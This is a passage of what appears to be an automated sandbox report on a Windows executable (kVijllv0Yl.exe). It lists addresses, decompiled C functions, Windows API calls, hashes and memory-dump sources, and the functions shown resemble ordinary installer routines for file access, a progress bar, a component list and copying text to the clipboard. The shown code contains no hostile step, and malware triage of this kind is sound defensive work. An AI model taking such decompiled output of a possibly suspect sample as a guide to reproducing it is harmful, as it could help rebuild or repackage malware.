                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                  • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                  • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                  • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E00401389(signed int _a4) {
                  				intOrPtr* _t6;
                  				void* _t8;
                  				void* _t10;
                  				signed int _t11;
                  				void* _t12;
                  				signed int _t16;
                  				signed int _t17;
                  				void* _t18;
                  
                  				_t17 = _a4;
                  				while(_t17 >= 0) {
                  					_t6 = _t17 * 0x1c +  *0x423ed0;
                  					if( *_t6 == 1) {
                  						break;
                  					}
                  					_push(_t6); // executed
                  					_t8 = E00401434(); // executed
                  					if(_t8 == 0x7fffffff) {
                  						return 0x7fffffff;
                  					}
                  					_t10 = E0040136D(_t8);
                  					if(_t10 != 0) {
                  						_t11 = _t10 - 1;
                  						_t16 = _t17;
                  						_t17 = _t11;
                  						_t12 = _t11 - _t16;
                  					} else {
                  						_t12 = _t10 + 1;
                  						_t17 = _t17 + 1;
                  					}
                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                  						 *0x42368c =  *0x42368c + _t12;
                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                  					}
                  				}
                  				return 0;
                  			}












                  APIs
                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                  • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                  • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                  • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0040575C(CHAR* _a4, long _a8, long _a12) {
                  				signed int _t5;
                  				void* _t6;
                  
                  				_t5 = GetFileAttributesA(_a4); // executed
                  				asm("sbb ecx, ecx");
                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                  				return _t6;
                  			}






                  APIs
                  • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 00405760
                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040573D(CHAR* _a4) {
                  				signed char _t3;
                  
                  				_t3 = GetFileAttributesA(_a4); // executed
                  				if(_t3 != 0xffffffff) {
                  					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                  				}
                  				return _t3;
                  			}





                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                  • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                  • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                  • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004031A8(void* _a4, long _a8) {
                  				int _t6;
                  				long _t10;
                  
                  				_t10 = _a8;
                  				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                  				if(_t6 == 0 || _a8 != _t10) {
                  					return 0;
                  				} else {
                  					return 1;
                  				}
                  			}






                  APIs
                  • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                  • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                  • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                  • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004031DA(long _a4) {
                  				long _t2;
                  
                  				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                  				return _t2;
                  			}





                  APIs
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                  • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                  • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                  • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                  				struct HWND__* _v8;
                  				long _v12;
                  				struct tagRECT _v28;
                  				void* _v36;
                  				signed int _v40;
                  				int _v44;
                  				int _v48;
                  				signed int _v52;
                  				int _v56;
                  				void* _v60;
                  				void* _v68;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				long _t87;
                  				unsigned int _t92;
                  				int _t94;
                  				int _t95;
                  				void* _t101;
                  				intOrPtr _t112;
                  				intOrPtr _t123;
                  				struct HWND__* _t127;
                  				int _t149;
                  				int _t150;
                  				struct HWND__* _t154;
                  				struct HWND__* _t158;
                  				struct HMENU__* _t160;
                  				long _t162;
                  				void* _t163;
                  				short* _t164;
                  
                  				_t154 =  *0x423684;
                  				_t149 = 0;
                  				_v8 = _t154;
                  				if(_a8 != 0x110) {
                  					if(_a8 == 0x405) {
                  						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                  					}
                  					if(_a8 != 0x111) {
                  						L17:
                  						if(_a8 != 0x404) {
                  							L25:
                  							if(_a8 != 0x7b || _a12 != _t154) {
                  								goto L20;
                  							} else {
                  								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                  								_a8 = _t87;
                  								if(_t87 <= _t149) {
                  									L37:
                  									return 0;
                  								}
                  								_t160 = CreatePopupMenu();
                  								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                  								_t92 = _a16;
                  								if(_t92 != 0xffffffff) {
                  									_t150 = _t92;
                  									_t94 = _t92 >> 0x10;
                  								} else {
                  									GetWindowRect(_t154,  &_v28);
                  									_t150 = _v28.left;
                  									_t94 = _v28.top;
                  								}
                  								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                  								_t162 = 1;
                  								if(_t95 == 1) {
                  									_v60 = _t149;
                  									_v48 = 0x420498;
                  									_v44 = 0xfff;
                  									_a4 = _a8;
                  									do {
                  										_a4 = _a4 - 1;
                  										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                  									} while (_a4 != _t149);
                  									OpenClipboard(_t149);
                  									EmptyClipboard();
                  									_t101 = GlobalAlloc(0x42, _t162);
                  									_a4 = _t101;
                  									_t163 = GlobalLock(_t101);
                  									do {
                  										_v48 = _t163;
                  										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                  										 *_t164 = 0xa0d;
                  										_t163 = _t164 + 2;
                  										_t149 = _t149 + 1;
                  									} while (_t149 < _a8);
                  									GlobalUnlock(_a4);
                  									SetClipboardData(1, _a4);
                  									CloseClipboard();
                  								}
                  								goto L37;
                  							}
                  						}
                  						if( *0x42366c == _t149) {
                  							ShowWindow( *0x423ea8, 8);
                  							if( *0x423f2c == _t149) {
                  								_t112 =  *0x41fc68; // 0x0
                  								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                  							}
                  							E00403E10(1);
                  							goto L25;
                  						}
                  						 *0x41f860 = 2;
                  						E00403E10(0x78);
                  						goto L20;
                  					} else {
                  						if(_a12 != 0x403) {
                  							L20:
                  							return E00403E9E(_a8, _a12, _a16);
                  						}
                  						ShowWindow( *0x423670, _t149);
                  						ShowWindow(_t154, 8);
                  						E00403E6C(_t154);
                  						goto L17;
                  					}
                  				}
                  				_v52 = _v52 | 0xffffffff;
                  				_v40 = _v40 | 0xffffffff;
                  				_v60 = 2;
                  				_v56 = 0;
                  				_v48 = 0;
                  				_v44 = 0;
                  				asm("stosd");
                  				asm("stosd");
                  				_t123 =  *0x423eb0;
                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                  				 *0x423670 = GetDlgItem(_a4, 0x403);
                  				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                  				_t127 = GetDlgItem(_a4, 0x3f8);
                  				 *0x423684 = _t127;
                  				_v8 = _t127;
                  				E00403E6C( *0x423670);
                  				 *0x423674 = E004046C5(4);
                  				 *0x42368c = 0;
                  				GetClientRect(_v8,  &_v28);
                  				_v52 = _v28.right - GetSystemMetrics(0x15);
                  				SendMessageA(_v8, 0x101b, 0,  &_v60);
                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                  				if(_a8 >= 0) {
                  					SendMessageA(_v8, 0x1001, 0, _a8);
                  					SendMessageA(_v8, 0x1026, 0, _a8);
                  				}
                  				if(_a12 >= _t149) {
                  					SendMessageA(_v8, 0x1024, _t149, _a12);
                  				}
                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                  				_push(0x1b);
                  				E00403E37(_a4);
                  				if(( *0x423eb8 & 0x00000003) != 0) {
                  					ShowWindow( *0x423670, _t149);
                  					if(( *0x423eb8 & 0x00000002) != 0) {
                  						 *0x423670 = _t149;
                  					} else {
                  						ShowWindow(_v8, 8);
                  					}
                  					E00403E6C( *0x423668);
                  				}
                  				_t158 = GetDlgItem(_a4, 0x3ec);
                  				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                  				if(( *0x423eb8 & 0x00000004) != 0) {
                  					SendMessageA(_t158, 0x409, _t149, _a12);
                  					SendMessageA(_t158, 0x2001, _t149, _a8);
                  				}
                  				goto L37;
                  			}


































                  APIs
                  • GetDlgItem.USER32 ref: 00404FC0
                  • GetDlgItem.USER32 ref: 00404FCF
                  • GetClientRect.USER32 ref: 0040500C
                  • GetSystemMetrics.USER32 ref: 00405014
                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                  • ShowWindow.USER32(?,00000008), ref: 004050B0
                  • GetDlgItem.USER32 ref: 004050D1
                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                  • GetDlgItem.USER32 ref: 00404FDE
                    • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                  • GetDlgItem.USER32 ref: 00405123
                  • CreateThread.KERNEL32 ref: 00405131
                  • CloseHandle.KERNEL32(00000000), ref: 00405138
                  • ShowWindow.USER32(00000000), ref: 0040515C
                  • ShowWindow.USER32(?,00000008), ref: 00405161
                  • ShowWindow.USER32(00000008), ref: 004051A8
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
                  • CreatePopupMenu.USER32 ref: 004051EB
                  • AppendMenuA.USER32 ref: 00405200
                  • GetWindowRect.USER32 ref: 00405213
                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                  • OpenClipboard.USER32(00000000), ref: 00405282
                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                  • GlobalLock.KERNEL32 ref: 0040529B
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                  • SetClipboardData.USER32 ref: 004052D2
                  • CloseClipboard.USER32 ref: 004052D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                  • String ID: {
                  • API String ID: 590372296-366298937
                  • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                  • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                  • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                  • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                  				struct HWND__* _v8;
                  				struct HWND__* _v12;
                  				signed int _v16;
                  				intOrPtr _v20;
                  				void* _v24;
                  				long _v28;
                  				int _v32;
                  				signed int _v40;
                  				int _v44;
                  				signed int* _v56;
                  				intOrPtr _v60;
                  				signed int _v64;
                  				long _v68;
                  				void* _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				void* _v84;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t182;
                  				int _t196;
                  				long _t202;
                  				signed int _t206;
                  				signed int _t217;
                  				void* _t220;
                  				void* _t221;
                  				int _t227;
                  				signed int _t232;
                  				signed int _t233;
                  				signed int _t240;
                  				struct HBITMAP__* _t250;
                  				void* _t252;
                  				char* _t268;
                  				signed char _t269;
                  				long _t274;
                  				int _t280;
                  				signed int* _t281;
                  				int _t282;
                  				long _t283;
                  				int _t285;
                  				long _t286;
                  				signed int _t287;
                  				long _t288;
                  				signed int _t291;
                  				signed int _t298;
                  				signed int _t300;
                  				signed int _t302;
                  				int* _t310;
                  				void* _t311;
                  				int _t315;
                  				int _t316;
                  				int _t317;
                  				signed int _t318;
                  				void* _t320;
                  
                  				_v12 = GetDlgItem(_a4, 0x3f9);
                  				_t182 = GetDlgItem(_a4, 0x408);
                  				_t280 =  *0x423ec8;
                  				_t320 = SendMessageA;
                  				_v8 = _t182;
                  				_t315 = 0;
                  				_v32 = _t280;
                  				_v20 =  *0x423eb0 + 0x94;
                  				if(_a8 != 0x110) {
                  					L23:
                  					if(_a8 != 0x405) {
                  						_t289 = _a16;
                  					} else {
                  						_a12 = _t315;
                  						_t289 = 1;
                  						_a8 = 0x40f;
                  						_a16 = 1;
                  					}
                  					if(_a8 == 0x4e || _a8 == 0x413) {
                  						_v16 = _t289;
                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                  							if(( *0x423eb9 & 0x00000002) != 0) {
                  								L41:
                  								if(_v16 != _t315) {
                  									_t232 = _v16;
                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                  									}
                  									_t233 = _v16;
                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                  										} else {
                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                  										}
                  									}
                  								}
                  								goto L48;
                  							}
                  							if(_a8 == 0x413) {
                  								L33:
                  								_t289 = 0 | _a8 != 0x00000413;
                  								_t240 = E004046F2(_v8, _a8 != 0x413);
                  								if(_t240 >= _t315) {
                  									_t93 = _t280 + 8; // 0x8
                  									_t310 = _t240 * 0x418 + _t93;
                  									_t289 =  *_t310;
                  									if((_t289 & 0x00000010) == 0) {
                  										if((_t289 & 0x00000040) == 0) {
                  											_t298 = _t289 ^ 0x00000001;
                  										} else {
                  											_t300 = _t289 ^ 0x00000080;
                  											if(_t300 >= 0) {
                  												_t298 = _t300 & 0xfffffffe;
                  											} else {
                  												_t298 = _t300 | 0x00000001;
                  											}
                  										}
                  										 *_t310 = _t298;
                  										E0040117D(_t240);
                  										_t289 = 1;
                  										_a8 = 0x40f;
                  										_a12 = 1;
                  										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
                  									}
                  								}
                  								goto L41;
                  							}
                  							_t289 = _a16;
                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                  								goto L41;
                  							}
                  							goto L33;
                  						} else {
                  							goto L48;
                  						}
                  					} else {
                  						L48:
                  						if(_a8 != 0x111) {
                  							L56:
                  							if(_a8 == 0x200) {
                  								SendMessageA(_v8, 0x200, _t315, _t315);
                  							}
                  							if(_a8 == 0x40b) {
                  								_t220 =  *0x420474;
                  								if(_t220 != _t315) {
                  									ImageList_Destroy(_t220);
                  								}
                  								_t221 =  *0x42048c;
                  								if(_t221 != _t315) {
                  									GlobalFree(_t221);
                  								}
                  								 *0x420474 = _t315;
                  								 *0x42048c = _t315;
                  								 *0x423f00 = _t315;
                  							}
                  							if(_a8 != 0x40f) {
                  								L86:
                  								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
                  									_t316 = (0 | _a16 == 0x00000020) << 3;
                  									ShowWindow(_v8, _t316);
                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                  								}
                  								goto L89;
                  							} else {
                  								E004011EF(_t289, _t315, _t315);
                  								if(_a12 != _t315) {
                  									E0040140B(8);
                  								}
                  								if(_a16 == _t315) {
                  									L73:
                  									E004011EF(_t289, _t315, _t315);
                  									_v32 =  *0x42048c;
                  									_t196 =  *0x423ec8;
                  									_v60 = 0xf030;
                  									_v16 = _t315;
                  									if( *0x423ecc <= _t315) {
                  										L84:
                  										InvalidateRect(_v8, _t315, 1);
                  										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
                  											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                  										}
                  										goto L86;
                  									}
                  									_t281 = _t196 + 8;
                  									do {
                  										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                  										if(_t202 != _t315) {
                  											_t291 =  *_t281;
                  											_v68 = _t202;
                  											_v72 = 8;
                  											if((_t291 & 0x00000001) != 0) {
                  												_v72 = 9;
                  												_v56 =  &(_t281[4]);
                  												_t281[0] = _t281[0] & 0x000000fe;
                  											}
                  											if((_t291 & 0x00000040) == 0) {
                  												_t206 = (_t291 & 0x00000001) + 1;
                  												if((_t291 & 0x00000010) != 0) {
                  													_t206 = _t206 + 3;
                  												}
                  											} else {
                  												_t206 = 3;
                  											}
                  											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                  											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                  											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                  										}
                  										_v16 = _v16 + 1;
                  										_t281 =  &(_t281[0x106]);
                  									} while (_v16 <  *0x423ecc);
                  									goto L84;
                  								} else {
                  									_t282 = E004012E2( *0x42048c);
                  									E00401299(_t282);
                  									_t217 = 0;
                  									_t289 = 0;
                  									if(_t282 <= _t315) {
                  										L72:
                  										SendMessageA(_v12, 0x14e, _t289, _t315);
                  										_a16 = _t282;
                  										_a8 = 0x420;
                  										goto L73;
                  									} else {
                  										goto L69;
                  									}
                  									do {
                  										L69:
                  										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                  											_t289 = _t289 + 1;
                  										}
                  										_t217 = _t217 + 1;
                  									} while (_t217 < _t282);
                  									goto L72;
                  								}
                  							}
                  						}
                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                  							goto L89;
                  						} else {
                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                  							if(_t227 == 0xffffffff) {
                  								goto L89;
                  							}
                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                  							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                  								_t283 = 0x20;
                  							}
                  							E00401299(_t283);
                  							SendMessageA(_a4, 0x420, _t315, _t283);
                  							_a12 = 1;
                  							_a16 = _t315;
